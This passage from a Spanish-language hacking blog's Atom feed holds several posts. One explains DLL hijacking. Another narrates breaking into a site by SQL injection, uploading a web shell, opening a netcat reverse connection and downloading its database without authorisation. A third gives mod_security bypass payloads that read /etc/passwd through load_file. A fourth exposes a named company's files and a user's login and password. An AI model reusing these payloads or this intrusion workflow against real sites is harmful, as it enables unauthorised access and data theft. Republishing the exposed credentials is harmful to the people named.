en C vamos a hacer un DLL que haga algo tan simple como abrir un messagebox y que diga OWNED nada mas. y lo vamos a llamar igual que cualquiera de los dlls que usa mi aplicacion.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;usaremos god.dll hacemos nuestro dll y lo nombramos exactamente igual god.dll... ya estamos cerca lo copiamos y lo pegamos en: c:\hacking\soymuyjuackeroso\tools\inyector\dedaloinyecter\ es decir la carpeta donde está el programa y cuando lo abrimos en el momento de cargar el dll god no carga el que está en el system32 sino que carga el que está en su carpeta o_o entonces cuando lo abres sale un message box... O si hemos hackeado :D.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Les soy sincero aun me estoy familiarizando con el bug pero la verdad me parece muy interesante la manera de como explotar... aqui les dejo dos links uno de dll hijacking en &lt;a href="http://www.1337day.com/exploits/14905"&gt;nmap&lt;/a&gt; y otro en &lt;a href="http://poisoncode.diosdelared.com/?coment=11804"&gt;Firefox 7&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aun estoy estudiando el tema aun insisto que estoy investigandolo para poder poner luego un tutorial mejor o por que no encontrar dll hijacking en algun soft ;) &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://itfreekzone.blogspot.com/2010/08/dll-hijacking-otra-forma-de-explotar.html"&gt;Referencias y t00ls&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;he provado los dos bugs el de nmap y el de firefox ambos funcionan pueden probar o intentar con otro softs a ver que sale ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-9026117715895518823?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/9026117715895518823/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=9026117715895518823&amp;isPopup=true" title="3 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/9026117715895518823?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/9026117715895518823?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/10/dll-hijacking-simple-explain.html" title="DLL Hijacking (Simple Explain)" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://4.bp.blogspot.com/_112F2TUuD7w/SxQz-x8Wr3I/AAAAAAAAACo/oBuetfOi3Uk/S220/SB.jpg" /></author><thr:total>3</thr:total></entry><entry gd:etag="W/&quot;CUQDRn47eyp7ImA9WhdUGU8.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4709208614199755087</id><published>2011-10-06T10:04:00.000-07:00</published><updated>2011-10-06T10:49:37.003-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-06T10:49:37.003-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Sql Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="netcat" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><category scheme="http://www.blogger.com/atom/ns#" term="root" /><title>Sacando BDs sin Root</title><content type="html">viendo un caso muy comun cuando no tenemos root expl0it para cierto Kernel, para aquellos que coleccionan BDs o necesitan sacar información y no tienen root expl0it esto les servir...&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Primer Paso Encontrar un Bug...:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;http://myowning.com/ fuck puro html no hay bug mmm reverse DNS y...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;http://xxxxxx.com/noticia.php?id=12599' &amp;lt;--- Sql Injection :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;mmm inyectando... pero no sirve load_file CDSM y ahora... mmm cierto hay usuarios a ver Select...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien tenemos las password ahora al panel... mmm un uploader... si hay para subir avatar a ver vamos a subir shell... y....... :( no cdsm las renombra a jpg fuck! mmm otra forma mmm un uploader mas para subir imagenes en el post de la noticia y.... si! vamoooosssss subio la shell!!!!!!&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vamos a hacer &lt;a href="http://seguridadblanca.blogspot.com/2009/12/pentest-reverse-php-con-netcat.html"&gt;reverse connect&lt;/a&gt; con nuestro NetCat para ejecutar el local root expl0it :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); "&gt;&lt;img src="http://2.bp.blogspot.com/-EpCJFEKfhjk/To3mCndI_-I/AAAAAAAAAEw/6YKoecjF8Kc/s400/root.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5660433239299915746" style="cursor: pointer; width: 400px; height: 202px; " /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;Vemos que ya estamos conectados :) ahora si vemos en la shell la version del kernel y buscando en nuestro repertorio...??&lt;br /&gt;&lt;br /&gt;Ni mier... no hay ese local root exploit T.T y ahora? que hacemos CDSM como nosotros no somos defacers xD somos aficionados a la seguridad y por ahi queremos nada mas su base de datos como para tenerla, mi amigo &lt;a href="http://www.ar3sw0rmed.blogspot.com/"&gt;Ar3sW0rm3d&lt;/a&gt; al igual que yo es fanático de las BDS asi que cerramos nuestro nc y regresamos a la shell... vamos a ir al directorio de las noticias y vamos a buscar su config.php diria que lo busquemos desde el netcat pero para que tener mas cosas abiertas? xD&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y aqui esta el Config.php&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;$host = "localhost";&lt;br /&gt;$username = "root";&lt;br /&gt;$password = "xxx";&lt;br /&gt;$dbname = "xxxx";&lt;br /&gt;&lt;br /&gt;$cur = "xxx";&lt;br /&gt;$sitemail = x@xx.com';&lt;br /&gt;&lt;br /&gt;$twitter = ""; //Twitter account&lt;br /&gt;&lt;br /&gt;$language = 'es';&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora nos vamos a la pestana de SQL de nuestra shell y connect.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-29SQJidmXeI/To3omnEuPQI/AAAAAAAAAE4/CefFgO6LYbw/s1600/shell.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img src="http://4.bp.blogspot.com/-29SQJidmXeI/To3omnEuPQI/AAAAAAAAAE4/CefFgO6LYbw/s400/shell.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5660436056696044802" style="cursor: pointer; width: 400px; height: 188px; " /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hacemos un backup download con la shell y ya tenemos su BD sin ser root ;) asi podemos hacer con todos los sitios ;) ya que podemos leer pero no escribir... o almenos esa será la situacion a la que nos enfrentamos obviamente nosotros queriamos entrar a dominar todo el server y bajarnos todo mas facil pero como no hay local root asi será una manera facil y rapida de sacar las BDs.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4709208614199755087?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/4709208614199755087/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4709208614199755087&amp;isPopup=true" title="4 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4709208614199755087?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4709208614199755087?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/10/sacando-bds-sin-root.html" title="Sacando BDs sin Root" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://4.bp.blogspot.com/_112F2TUuD7w/SxQz-x8Wr3I/AAAAAAAAACo/oBuetfOi3Uk/S220/SB.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-EpCJFEKfhjk/To3mCndI_-I/AAAAAAAAAEw/6YKoecjF8Kc/s72-c/root.png" height="72" width="72" /><thr:total>4</thr:total></entry><entry gd:etag="W/&quot;CEIHQ349fip7ImA9WhdVEU0.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-2707984995612054387</id><published>2011-09-15T08:57:00.000-07:00</published><updated>2011-09-15T09:02:12.066-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-15T09:02:12.066-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Eventos de Interes..." /><title>LimaHack 2011 CfP</title><content type="html">Arranca el Call For Papers para el LimaHack 2011...&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center; "&gt;&lt;a href="http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s1600/limahack2011.jpg" imageanchor="1" style="text-decoration: underline; color: rgb(204, 204, 204); margin-left: 1em; margin-right: 1em; "&gt;&lt;img border="0" height="153" src="http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s320/limahack2011.jpg" width="320" style="border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-width: initial; border-color: initial; position: relative; padding-top: 8px; padding-right: 8px; padding-bottom: 8px; padding-left: 8px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(34, 34, 34); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-color: transparent; border-right-color: transparent; border-bottom-color: transparent; border-left-color: transparent; -webkit-box-shadow: rgba(0, 0, 0, 0.199219) 0px 0px 0px; box-shadow: rgba(0, 0, 0, 0.199219) 0px 0px 0px; border-top-left-radius: 0px 0px; border-top-right-radius: 0px 0px; border-bottom-right-radius: 0px 0px; border-bottom-left-radius: 0px 0px; background-position: initial initial; background-repeat: initial initial; " /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Para más detalles visita: &lt;a href="http://limahack.com/"&gt;http://limahack.com/&lt;/a&gt; &lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Estaré presente aun no se si como expositor pero si iré a ver a toda la gente del Hackig Peruano en especial a los anonymous jajajajaja los veo.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2707984995612054387?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/2707984995612054387/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=2707984995612054387&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2707984995612054387?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2707984995612054387?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/09/limahack-2011-cfp.html" title="LimaHack 2011 CfP" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://4.bp.blogspot.com/_112F2TUuD7w/SxQz-x8Wr3I/AAAAAAAAACo/oBuetfOi3Uk/S220/SB.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s72-c/limahack2011.jpg" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;A0YFQXcyfCp7ImA9WhdSEUU.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4988784934018571341</id><published>2011-07-20T11:48:00.001-07:00</published><updated>2011-07-20T12:11:50.994-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-20T12:11:50.994-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Sql Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="bypass" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Bypass Mod_Security ASP</title><content type="html">No voy a usar un ejemplo real esta vez porque he tenido unos problemas pero igual les voy a mostrar casi exactamente como funciona este bypass...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;tenemos nuestro periodico en línea...&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=12&lt;br /&gt;&lt;br /&gt;santo cielo a ver que pasa si pongo comilla&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=12'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;mmm bueno no paso nada a ver si pongo un UNION SELECT&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=-1+UNION+SELECT+0--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OMG error pero no de mysql sino es mas bien 403...&lt;br /&gt;&lt;br /&gt;entonces que fue? vamos a ver... les explico mod_security lo que hace es con un algoritmo detectar lo que para el son ataques de sql injection... no me pregunten como funciona el algoritmo porque la verdad no estoy seguro como es el funcionamiento... pero... no es muy exacto... veamos lo que hace es filtrar la variable...&lt;br /&gt;&lt;br /&gt;id= -1 + UNION + SELECT + 0 --&lt;br /&gt;&lt;br /&gt;lo que vamos a hacer es descomponerla mita mita =)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=-1&amp;id=+UNION+SELECT&amp;id=+0--&lt;br /&gt;&lt;br /&gt;OMG sigue saliendo error a ver entonces tenemos que ofuscar un poco los comandos SQL para que no vote error de la siguiente manera&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=-1&amp;id=+UN/**/ION+SE/**/LECT&amp;id=+0--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OMG ya no mando error lo podemos ver =) fuck yeah... ahora a buscar mas tablas...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=-1&amp;id=+UN/**/ION+SE/**/LECT&amp;id=+0+1,2,3,4,5,6,7+FR/**/OM users--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ahora con esto activado y un poco de hex podemos sacar de todo...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;../../../etc/passwd ahi ese es el archivo que queremos sacar...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://xxx.com/noticias.asp?id=-1&amp;id=+UN/**/ION+SE/**/LECT&amp;id=+0+1,2,load_file(0x2e2e2f2e2e2f2e2e2f6574632f706173737764),4,5,6,7+FR/**/OM users--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;todo con ese bypass lo puse porque ayer me encontré con uno de estos y lo quería compartir... es bien simple como ven y bien util, puden sacar todos los datos que quieran es igual que en cualquier sql injection normal... hay variantes del bypass si no funciona con UN/**/ION y asi... fijense ustedes como puden bypassear cambiando en mayusculas y minusculas el lugar de los comentarios y mucho mas...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Suerte :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4988784934018571341?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/4988784934018571341/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4988784934018571341&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4988784934018571341?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4988784934018571341?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/07/bypass-modsecurity-asp.html" title="Bypass Mod_Security ASP" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://4.bp.blogspot.com/_112F2TUuD7w/SxQz-x8Wr3I/AAAAAAAAACo/oBuetfOi3Uk/S220/SB.jpg" /></author><thr:total>2</thr:total></entry><entry gd:etag="W/&quot;CkcFQHk9eip7ImA9WhdTF0o.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4580878493797146016</id><published>2011-07-15T12:03:00.000-07:00</published><updated>2011-07-15T15:46:51.762-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-15T15:46:51.762-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="BUG" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Vilsol (IT Security) Analizandolos...</title><content type="html">El era la guía para pelear contra Anonymous...&lt;br /&gt;&lt;br /&gt;Bueno yo escuché hablar por la tele al Super IT Security Expert Alexis Villagra de Vilsol sobre los ataques de Anonymous al Gobierno peruano explico cosas que a muchos les habrá sido dificil entender... para mi este hombre no es mas que un pobre atarantador... con lo que voy a poner aquí no sean escandalosos no quiero que se haga algo mas grande de lo que debe ser solo demostrar que los que mas hablan son los que menos hacen y los que mas hacen menos hablamos...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.youtube.com/watch?v=HfJPpEBJOp8 ese es uno de los videos en los que habla... se le ve muy experimentado pero... y su seguridad? donde queda en su web?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.vilsol.com es su pagina web en la que ofrece servicios de seguridad diciendo ser su empresa excelente con la seguridad pero señor Alexis como lo contrato si usted tiene errores garrafales de seguridad en su página web...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Le recuerdo señor que este tipo de archivos no debería ser público:&lt;br /&gt;&lt;br /&gt;http://www.vilsol.com/info.php&lt;br /&gt;&lt;br /&gt;Le recuerdo señor que no es bueno poner Malware en su hosting...&lt;br /&gt;&lt;br /&gt;http://www.vilsol.com/_private/&lt;br /&gt;&lt;br /&gt;archivo: bot.exe &lt;br /&gt;&lt;br /&gt;publicaría el codigo fuente pero eso sería irrumpir en contra de "su software"...&lt;br /&gt;&lt;br /&gt;le recuerdo señor... que existe algo llamado htaccess para que no se listen sus directorios...&lt;br /&gt;&lt;br /&gt;http://www.vilsol.com/demos/&lt;br /&gt;&lt;br /&gt;Le recuerdo señor que la base de datos... son un elemento privado que debe ser CIFRADO y que debe proteger a sus clientes...&lt;br /&gt;&lt;br /&gt;http://www.vilsol.com/sql/localhost.sql &lt;-- este fue el que mas me impacto...&lt;br /&gt;&lt;br /&gt;señor si quisiera podría hacer publico su correo electrónico...&lt;br /&gt;&lt;br /&gt;INSERT INTO usuario (login, password, secciones, usuario_nombre, usuario_apellidos, usuario_celular, usuario_rpm, usuario_email)&lt;br /&gt;&lt;br /&gt;('camila', 'vilsol', 'a,b,c,d,e,f,g,h,i,j,k,l,n,o,p,q,r', 'Camila', 'Arana', '-', '-', 'ventas@vilsol.com'),&lt;br /&gt;&lt;br /&gt;cual creen que será la clave de su correo electronico?&lt;br /&gt;&lt;br /&gt;señor sus includes?&lt;br /&gt;&lt;br /&gt;http://www.vilsol.com/inc/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;lo que me da mas tristesa es que alguien que tiene una mentalidad tan pobre y solo le importa la plata pueda ser tan reconocido como experto en seguridad... señor... yo no lo hago con intensión de demostrar que puedo usar un scanner ni que se como funciona el SQL o el nikto o como se usa un editor hexadecimal lo hago porque usted se la da de experto se mantiene arriba y gente buena inteligente... empresas de seguridad peruana que si valen la pena hackers encarcelados con mucho mas talento que usted estan pobres... &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Gobierno Peruano... Peruano piensen un poco quien MIERDA comanda el pais y a quien escuchamos en las noticias.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Que quede claro que esos Anonymous tambien me llegan al webo asi que ni crean que hago esto por apoyarlos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PD: señor http://www.vilsol.com/sql/extract.php no se que hace con un script para extraer correos... eso es de carders y ladrones...no me diga... estab provando? ja! y el bot?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4580878493797146016?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/4580878493797146016/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4580878493797146016&amp;isPopup=true" title="7 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4580878493797146016?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4580878493797146016?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/07/vilsol-it-security-analizandolos.html" title="Vilsol (IT Security) Analizandolos..." /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://4.bp.blogspot.com/_112F2TUuD7w/SxQz-x8Wr3I/AAAAAAAAACo/oBuetfOi3Uk/S220/SB.jpg" /></author><thr:total>7</thr:total></entry></feed>

